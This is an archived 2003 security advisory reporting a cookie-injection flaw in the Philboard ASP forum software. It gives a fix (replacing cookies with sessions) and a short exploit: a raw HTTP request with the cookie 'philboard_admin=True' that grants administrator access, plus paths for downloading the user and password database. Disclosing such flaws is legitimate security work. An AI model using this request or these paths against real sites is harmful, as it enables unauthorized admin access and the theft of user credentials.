OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Philboard Forum Vulnerability

aresubosen.net
Date: Thu May 29 2003 - 03:48:45 CDT


Philboard Vulnerability

Severity : High (Possible gain administrator/users access on Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status : Vendor contacted, fixed version is not available (cause they didn't
response)
Author : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka,
and All 1ndonesian Security Team (1st)
#romancecentrin.net.id
http://www.bosen.net/releases/

Summary
=======
Philboard is freeware forum application under ASP Scripts.
Vulnerable script is on cookie management, all most script is vulnerable for
cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"

Acknowledgments
===============
Vulnerability discovery and advisory by AresU

Vendor Response
===============
Vendor has contacted and fixed version is not available (cause they didn't
reponse)
To Fix the script, you must change every cookie command in to session command.

Exploit Code
============
1) Login Administrator Forum:
Use your telnet and open target on port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb

-----------------------------------------------
This mail sent through http://webmail.bosen.net